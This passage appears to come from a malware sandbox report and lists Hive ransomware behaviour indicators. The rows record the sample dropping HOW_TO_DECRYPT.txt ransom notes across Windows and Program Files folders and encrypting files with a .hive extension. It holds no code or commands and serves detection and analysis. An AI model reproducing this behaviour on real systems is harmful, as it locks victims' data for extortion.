File created	C:\Windows\SysWOW64\ja-JP\Licenses\_Default\HomePremiumE\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\Microsoft\Protect\S-1-5-18\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\SMI\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\ja-JP\Licenses\OEM\ProfessionalN\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\en-US\Licenses\_Default\Ultimate\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\es-ES\Licenses\eval\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\DriverStore\FileRepository\prnlx00w.inf_amd64_neutral_d4c93bb2fbf75723\Amd64\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\LogFiles\Fax\Incoming\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\fr-FR\Licenses\OEM\EnterpriseN\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\DriverStore\FileRepository\prnts003.inf_amd64_neutral_33a68664c7e7ae4b\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\de-DE\Licenses\OEM\ProfessionalE\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\fr-FR\Licenses\OEM\HomePremium\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\migwiz\replacementmanifests\WindowsSearchEngine\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\it-IT\Licenses\OEM\HomePremiumN\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\DriverStore\FileRepository\ts_generic.inf_amd64_neutral_1a5c861fdb3aab0e\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\Setup\en-US\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\winrm\0C0A\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A

Drops file in Program Files directory

Description	Indicator	Process	Target
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\ink\it-IT\InkObj.dll.mui	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\7-Zip\Lang\kaa.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\pack200.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\larrow.gif	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.properties	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_ja_4.4.0.v20140623020002.jar	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Rothera.2bFe2RNXl41EgVSI0NCD70GP5cOBwBdJuW580hA-2Vo.hive	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench_1.2.1.v20140901-1244.jar.2bFe2RNXl41EgVSI0NCD78oP2MmmoJJdQji997Mgok8.hive	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187863.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN011.XML	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN048.XML	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Etc\GMT-2	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\PROOF\MSLID.DLL	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_standard_plugin.dll.2bFe2RNXl41EgVSI0NCD7xkiSyCU1ScgKS0pFyu_um4.hive	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\it-IT\settings.html	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01237_.GIF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN022.XML	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\goopdateres_ca.dll.2bFe2RNXl41EgVSI0NCD7wvCobrLKWhf2w-HM8r4bUs.hive	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Program Files\Common Files\Microsoft Shared\TextConv\ja-JP\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Kabul	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\es\System.Speech.resources.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi422_yuy2_plugin.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Khandyga.2bFe2RNXl41EgVSI0NCD7796YB0cEIkZE1e0ETZVTnM.hive	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\de\System.Data.Entity.Design.Resources.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\css\flyout.css	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-remote.xml.2bFe2RNXl41EgVSI0NCD76S1cWGVPlodmooWj50QGCs.hive	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Africa\Ceuta.2bFe2RNXl41EgVSI0NCD73k8tJvkjocOZFPmdmKa_VM.hive	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Program Files\Common Files\Microsoft Shared\VGX\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Warsaw	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\eo\LC_MESSAGES\vlc.mo	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Buenos_Aires	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Vancouver.2bFe2RNXl41EgVSI0NCD77yOdKtCVsxDEjPe1eDUkxg.hive	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-annotations-common.xml	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_10_p010_plugin.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SoftBlue\background.gif	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OISGRAPH.DLL	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Program Files\Windows NT\TableTextService\en-US\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL081.XML	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Page_PAL.wmv	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jstatd.exe.2bFe2RNXl41EgVSI0NCD775SzVPF-wkk8ebqOL-eiUs.hive	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178459.JPG	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315580.JPG	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Boise.2bFe2RNXl41EgVSI0NCD70MYSwJwaNsVo_aPuISJXyQ.hive	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightYellow\TAB_ON.GIF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh87.2bFe2RNXl41EgVSI0NCD77GB3T9BMkka3AYItwybdSU.hive	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\combo-hover-left.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\RSSFeeds.html	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_zh_4.4.0.v20140623020002.jar.2bFe2RNXl41EgVSI0NCD79z0a_HYFy0Z2qW31I2ayVg.hive	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\background.gif	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Apia	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\SmartTagInstall.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105246.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Java\jre7\lib\javaws.jar.2bFe2RNXl41EgVSI0NCD787SOSDduxMSY-ODBH1GVU4.hive	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Cave_Drawings.gif	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Amsterdam	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color48.jpg	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01182_.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0149407.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Belize.2bFe2RNXl41EgVSI0NCD70cbcmWKSv95Fbwb9O0qNGc.hive	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A

Drops file in Windows directory

Description	Indicator	Process	Target
File created	C:\Windows\Globalization\MCT\MCT-ZA\RSSFeed\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_32\System.Transactions\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_MSIL\System.IO.Log\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_MSIL\System.Web.Extensions.Design.resources\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_MSIL\ehexthost\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Globalization\ELS\Transliteration\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel\v4.0_4.0.0.0__b03f5f7f11d50a3a\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Resources\Themes\Aero\Shell\NormalColor\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_32\mcstoredb\6.1.0.0__31bf3856ad364e35\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_MSIL\System.Core.resources\3.5.0.0_es_b77a5c561934e089\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Help\mui\0C0A\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Instrumentation\v4.0_4.0.0.0__b77a5c561934e089\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Speech\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Tasks.resources\2.0.0.0_it_b03f5f7f11d50a3a\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_MSIL\System.Web.RegularExpressions\2.0.0.0__b03f5f7f11d50a3a\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\IME\IMEJP10\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Media\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading.Tasks\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_MSIL\System.Web.Extensions.Design.resources\3.5.0.0_es_31bf3856ad364e35\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Boot\PCAT\zh-CN\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Help\Windows\de-DE\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SetupCache\v4.7.03062\1046\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Reflection.Primitives\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Resources\Themes\Aero\Shell\NormalColor\fr-FR\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_32\MSBuild\3.5.0.0__b03f5f7f11d50a3a\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.Commands.UpdateDiagRootcause.Resources\1.0.0.0_de_31bf3856ad364e35\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_MSIL\PresentationBuildTasks.resources\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Branding\Basebrd\de-DE\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_MSIL\System.Workflow.Activities\3.0.0.0__31bf3856ad364e35\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_MSIL\System.Data.DataSetExtensions\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\it-IT\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Microsoft.NET\Framework64\v3.5\SQL\EN\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SetupCache\v4.7.03062\1032\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Editor.Resources\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_MSIL\System.Web.Routing.resources\3.5.0.0_de_31bf3856ad364e35\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\CSC\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_64\System.Printing\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_MSIL\System.Web.Abstractions\3.5.0.0__31bf3856ad364e35\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_MSIL\System.Web.Services.resources\2.0.0.0_de_b03f5f7f11d50a3a\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Globalization\MCT\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\Fonts\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Globalization\MCT\MCT-ZA\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_64\System.EnterpriseServices\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_MSIL\system.management.resources\2.0.0.0_de_b03f5f7f11d50a3a\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Panther\setup.exe\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_MSIL\Microsoft.Office.BusinessData.Intl\14.0.0.0__71e9bce111e9429c\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_MSIL\Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_MSIL\System.resources\2.0.0.0_ja_b77a5c561934e089\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
